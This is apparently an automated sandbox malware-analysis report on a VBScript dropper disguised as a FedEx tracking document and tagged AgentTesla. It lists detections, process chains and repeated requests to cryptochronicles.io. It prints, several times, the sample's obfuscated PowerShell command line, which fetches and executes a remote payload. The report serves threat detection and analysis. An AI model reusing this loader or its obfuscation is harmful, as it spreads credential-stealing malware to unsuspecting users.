Windows Analysis Report
CR-FEDEX_TN-775537409198_Doc.vbs

Overview

General Information

Sample name: CR-FEDEX_TN-775537409198_Doc.vbs
Analysis ID: 1430126
MD5: 7adbafc63cc01ebeae27fd4074430da1
SHA1: 9868805bad5478b2400d637b268f1aebea0b6c67
SHA256: fb712dfc934fe7630f1e6e2b2bd79be641de26accc34fda08c3f6e269d40c9b4
Tags: AgentTeslavbs
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Multi AV Scanner detection for domain / URL
Source: cryptochronicles.io Virustotal: Detection: 9% Perma Link
Source: http://cryptochronicles.io Virustotal: Detection: 9% Perma Link
Source: http://cryptochronicles.io/mgbo1/Noninstrumentally.qxd Virustotal: Detection: 9% Perma Link
Multi AV Scanner detection for submitted file
Source: CR-FEDEX_TN-775537409198_Doc.vbs Virustotal: Detection: 28% Perma Link
Source: CR-FEDEX_TN-775537409198_Doc.vbs ReversingLabs: Detection: 18%
Source: Binary string: ore.pdb source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbJS source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbGE source: powershell.exe, 00000008.00000002.2518113345.000002106CD64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb[ source: powershell.exe, 00000008.00000002.2520628764.000002106EBF4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.2521948578.000002106EE60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbR source: powershell.exe, 00000008.00000002.2520628764.000002106EBF4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: embly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbdllh source: powershell.exe, 00000008.00000002.2520628764.000002106EBF4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ore.pdbk source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.pdb source: powershell.exe, 00000008.00000002.2518113345.000002106CD64000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000008.00000002.2521948578.000002106EE9A000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cryptochronicles.ioConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.io
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mgbo1/Noninstrumentally.qxd HTTP/1.1Host: cryptochronicles.ioConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: google.com
Source: powershell.exe, 00000008.00000002.2491936262.0000021001A51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cryptochronicles.io
Source: powershell.exe, 00000008.00000002.2491936262.0000021000227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cryptochronicles.io/mgbo1/Noninstrumentally.qxdP
Source: powershell.exe, 00000008.00000002.2491936262.0000021000477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cryptochronicles.io0
Source: wscript.exe, 00000000.00000003.1215958452.00000284130A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1216836950.00000284130A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215790449.00000284130A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000003.1215958452.00000284130A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1216836950.00000284130A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215790449.00000284130A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/-
Source: wscript.exe, 00000000.00000003.1236757544.0000028411140000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1237590407.000002841115D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.1236757544.0000028411140000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1236757544.00000284111A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1237590407.000002841115D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1237590407.00000284111A2000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1217504358.0000028413041000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4de1b9362c074
Source: wscript.exe, 00000000.00000003.1217146005.00000284111AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?4de1b9362c
Source: powershell.exe, 00000008.00000002.2514971891.00000210101AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2491936262.0000021000227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2491936262.0000021000001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000008.00000002.2491936262.0000021000227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.2491936262.0000021000001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.2491936262.0000021000227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.2514971891.00000210101AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2514971891.000002101006D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

System Summary
barindex
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6388
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6388 Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Memoirer = 1;$Pennefjerene245='Substrin';$Pennefjerene245+='g';Function Tabellariske($Assessorerne57){$Dekorationernendmarcherne110=$Assessorerne57.Length-$Memoirer;For($Dekorationerne=5; $Dekorationerne -lt $Dekorationernendmarcherne110; $Dekorationerne+=(6)){$Egebark130+=$Assessorerne57.$Pennefjerene245.Invoke($Dekorationerne, $Memoirer);}$Egebark130;}function Gdedes($Ondograph){. ($Parkin) ($Ondograph);}$Frieri=Tabellariske 'ForarMChimeoSexopzEmceiipiepolMyt.olBundtaNaiad/ H gh5 C,it.Af.en0Drost Nabog(EmissWC mplibve.sn ,ynadInsnao Connw L,cosEf.er BrugsNNonalT utb Sind1 roer0Paros.Balka0B,dri;.rama TsarWD sbei,enitn N gl6borts4energ;Fulda HistixTauri6 m da4Kotur; S is DietarRallyvVeri,:Frems1P eli2Condy1zinco.Falte0Eksam) Str. OminsGEmbedesaccucmakkek Ev noAfgjo/My.op2penci0Malmh1 U,fe0Forew0Prste1Syntr0St.ve1Fremm BilfFGo.hii futurBookse T.ecfNonc,oBebudxSe io/Burd.1Color2Ibrug1 Kniv.tel f0 Indu ';$Tempestuous=Tabellariske ',olarUmak,osBlokaeU nigrGodst-SuperA Spl,gUneleenarcin Salgtj,bga ';$Volow159=Tabellariske 'cab.ahGeno.tShirttPediapNedis:Fac.n/ Post/ PeaicFurazrStuddyKidnapDipletaktivo .inecApotehAquilrColanoJomfrnDeveliA,axicForudl Afpae tchbsUrteh.Inte.i YeddoPebfl/Trai mB.comgnon xbF.ssioadult1 Past/Mo.phNBerneoNytten Un riL.gnenLjsersEsdratArbejrS.steuSve,dm Bride,onzanIndkotW,undaHyinglA onilOptniyBlaaj. KeypqQuarrxVelgrd,adde ';$Baandvv=Tabellariske 'Dolme>Skots ';$Parkin=Tabellariske 'PassiiElapie VicexOps.g ';$Sulevlling = Tabellariske 'Cu che BreacOrdenhBeordoWald Si e%Ska.ra Fly.pNyh,dpSlumpdd.mmea ploutCl imaAgerd%Tis.y\S,adspSyndia ccenrCompaa ,tond rndbeBio,erS,cari kottnYuckegToxiceBlok rKhasanFerieeSekse.AdderSProcttCabb ePortu Unpro& Asso& Calf SteneGemysc Eva h Kro oHardd resse$St.ep ';Gdedes (Tabellariske 'spiro$Rea.cgMytholovertoL gnebHyperaArmodlArres:Arb.jRKrtegoTeknosOprems PulveSemibl Corrl.ibleifarmanRat fi CavosHand,=Verek(UdstacEutopmSubcodgulvm Noti / Terrc abel Dupli$BrainSTertiu ovolDrbyseHenlevBrsspl Gyptlsouthi FundnInterg Stil)Justi ');Gdedes (Tabellariske 'Appea$MahargGodmol nteroA,klebMusicaConfelYd rp:Poss,eProc,kDukkesK.ffepB.lene Teatr BalatBespalWhirriS.cren PinciHethie ensn .nre=,picl$avlsdVThougo,heumlelen,oKvad wTopch1Weeke5Infer9Defer.billasBefarpCecidlTekniiManu.tLeuco(Hjem $,orplBAloeraIncapaHa slnNaiandKollev SemivScoa.)Permi ');$Volow159=$ekspertlinien[0];Gdedes (Tabellariske 'Macro$ SkrmgBushwlAdelsoAmfetbHvsnia BlodlNapol:FormesLovemo.ommal.ocioo Car.sM.onspHieroiAfrunlFemk s Serp= C emN Vej eCrompwAnger-Sta.lOSmigrb DeltjIndisefarvecEnougtLin,e eng,SCiselyF.ttos Bar,tHori eAntismFe,ul.CanceNForlgeBemantchlor.CesarWInstreDakenb CephC Menfl AstriTandbePerfen Sup tStopp ');Gdedes (Tabellariske 'Forre$F,rgas PredoImagelI,iotoGammes r,bepAccidiAnkyllOverasPyrom. P nkHgoldbeSmrreaFrygtdKul.ieS.brarsrbehs Ho o[Pr,co$SquifTKloake C.ibmMacroppaakre Ove.sKalcitPreacuHft
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Memoirer = 1;$Pennefjerene245='Substrin';$Pennefjerene245+='g';Function Tabellariske($Assessorerne57){$Dekorationernendmarcherne110=$Assessorerne57.Length-$Memoirer;For($Dekorationerne=5; $Dekorationerne -lt $Dekorationernendmarcherne110; $Dekorationerne+=(6)){$Egebark130+=$Assessorerne57.$Pennefjerene245.Invoke($Dekorationerne, $Memoirer);}$Egebark130;}function Gdedes($Ondograph){. ($Parkin) ($Ondograph);}$Frieri=Tabellariske 'ForarMChimeoSexopzEmceiipiepolMyt.olBundtaNaiad/ H gh5 C,it.Af.en0Drost Nabog(EmissWC mplibve.sn ,ynadInsnao Connw L,cosEf.er BrugsNNonalT utb Sind1 roer0Paros.Balka0B,dri;.rama TsarWD sbei,enitn N gl6borts4energ;Fulda HistixTauri6 m da4Kotur; S is DietarRallyvVeri,:Frems1P eli2Condy1zinco.Falte0Eksam) Str. OminsGEmbedesaccucmakkek Ev noAfgjo/My.op2penci0Malmh1 U,fe0Forew0Prste1Syntr0St.ve1Fremm BilfFGo.hii futurBookse T.ecfNonc,oBebudxSe io/Burd.1Color2Ibrug1 Kniv.tel f0 Indu ';$Tempestuous=Tabellariske ',olarUmak,osBlokaeU nigrGodst-SuperA Spl,gUneleenarcin Salgtj,bga ';$Volow159=Tabellariske 'cab.ahGeno.tShirttPediapNedis:Fac.n/ Post/ PeaicFurazrStuddyKidnapDipletaktivo .inecApotehAquilrColanoJomfrnDeveliA,axicForudl Afpae tchbsUrteh.Inte.i YeddoPebfl/Trai mB.comgnon xbF.ssioadult1 Past/Mo.phNBerneoNytten Un riL.gnenLjsersEsdratArbejrS.steuSve,dm Bride,onzanIndkotW,undaHyinglA onilOptniyBlaaj. KeypqQuarrxVelgrd,adde ';$Baandvv=Tabellariske 'Dolme>Skots ';$Parkin=Tabellariske 'PassiiElapie VicexOps.g ';$Sulevlling = Tabellariske 'Cu che BreacOrdenhBeordoWald Si e%Ska.ra Fly.pNyh,dpSlumpdd.mmea ploutCl imaAgerd%Tis.y\S,adspSyndia ccenrCompaa ,tond rndbeBio,erS,cari kottnYuckegToxiceBlok rKhasanFerieeSekse.AdderSProcttCabb ePortu Unpro& Asso& Calf SteneGemysc Eva h Kro oHardd resse$St.ep ';Gdedes (Tabellariske 'spiro$Rea.cgMytholovertoL gnebHyperaArmodlArres:Arb.jRKrtegoTeknosOprems PulveSemibl Corrl.ibleifarmanRat fi CavosHand,=Verek(UdstacEutopmSubcodgulvm Noti / Terrc abel Dupli$BrainSTertiu ovolDrbyseHenlevBrsspl Gyptlsouthi FundnInterg Stil)Justi ');Gdedes (Tabellariske 'Appea$MahargGodmol nteroA,klebMusicaConfelYd rp:Poss,eProc,kDukkesK.ffepB.lene Teatr BalatBespalWhirriS.cren PinciHethie ensn .nre=,picl$avlsdVThougo,heumlelen,oKvad wTopch1Weeke5Infer9Defer.billasBefarpCecidlTekniiManu.tLeuco(Hjem $,orplBAloeraIncapaHa slnNaiandKollev SemivScoa.)Permi ');$Volow159=$ekspertlinien[0];Gdedes (Tabellariske 'Macro$ SkrmgBushwlAdelsoAmfetbHvsnia BlodlNapol:FormesLovemo.ommal.ocioo Car.sM.onspHieroiAfrunlFemk s Serp= C emN Vej eCrompwAnger-Sta.lOSmigrb DeltjIndisefarvecEnougtLin,e eng,SCiselyF.ttos Bar,tHori eAntismFe,ul.CanceNForlgeBemantchlor.CesarWInstreDakenb CephC Menfl AstriTandbePerfen Sup tStopp ');Gdedes (Tabellariske 'Forre$F,rgas PredoImagelI,iotoGammes r,bepAccidiAnkyllOverasPyrom. P nkHgoldbeSmrreaFrygtdKul.ieS.brarsrbehs Ho o[Pr,co$SquifTKloake C.ibmMacroppaakre Ove.sKalcitPreacuHft Jump to behavior
Java / VBScript file with very long strings (likely obfuscated code)
Source: CR-FEDEX_TN-775537409198_Doc.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@15/5@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\paraderingerne.Ste Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dgufca1.ras.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CR-FEDEX_TN-775537409198_Doc.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: CR-FEDEX_TN-775537409198_Doc.vbs Virustotal: Detection: 28%
Source: CR-FEDEX_TN-775537409198_Doc.vbs ReversingLabs: Detection: 18%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CR-FEDEX_TN-775537409198_Doc.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
Source: C:\Windows\System32\PING.EXE Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping %.%.%.%
Source: C:\Windows\System32\PING.EXE Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Memoirer = 1;$Pennefjerene245='Substrin';$Pennefjerene245+='g';Function Tabellariske($Assessorerne57){$Dekorationernendmarcherne110=$Assessorerne57.Length-$Memoirer;For($Dekorationerne=5; $Dekorationerne -lt $Dekorationernendmarcherne110; $Dekorationerne+=(6)){$Egebark130+=$Assessorerne57.$Pennefjerene245.Invoke($Dekorationerne, $Memoirer);}$Egebark130;}function Gdedes($Ondograph){. ($Parkin) ($Ondograph);}$Frieri=Tabellariske 'ForarMChimeoSexopzEmceiipiepolMyt.olBundtaNaiad/ H gh5 C,it.Af.en0Drost Nabog(EmissWC mplibve.sn ,ynadInsnao Connw L,cosEf.er BrugsNNonalT utb Sind1 roer0Paros.Balka0B,dri;.rama TsarWD sbei,enitn N gl6borts4energ;Fulda HistixTauri6 m da4Kotur; S is DietarRallyvVeri,:Frems1P eli2Condy1zinco.Falte0Eksam) Str. OminsGEmbedesaccucmakkek Ev noAfgjo/My.op2penci0Malmh1 U,fe0Forew0Prste1Syntr0St.ve1Fremm BilfFGo.hii futurBookse T.ecfNonc,oBebudxSe io/Burd.1Color2Ibrug1 Kniv.tel f0 Indu ';$Tempestuous=Tabellariske ',olarUmak,osBlokaeU nigrGodst-SuperA Spl,gUneleenarcin Salgtj,bga ';$Volow159=Tabellariske 'cab.ahGeno.tShirttPediapNedis:Fac.n/ Post/ PeaicFurazrStuddyKidnapDipletaktivo .inecApotehAquilrColanoJomfrnDeveliA,axicForudl Afpae tchbsUrteh.Inte.i YeddoPebfl/Trai mB.comgnon xbF.ssioadult1 Past/Mo.phNBerneoNytten Un riL.gnenLjsersEsdratArbejrS.steuSve,dm Bride,onzanIndkotW,undaHyinglA onilOptniyBlaaj. KeypqQuarrxVelgrd,adde ';$Baandvv=Tabellariske 'Dolme>Skots ';$Parkin=Tabellariske 'PassiiElapie VicexOps.g ';$Sulevlling = Tabellariske 'Cu che BreacOrdenhBeordoWald Si e%Ska.ra Fly.pNyh,dpSlumpdd.mmea 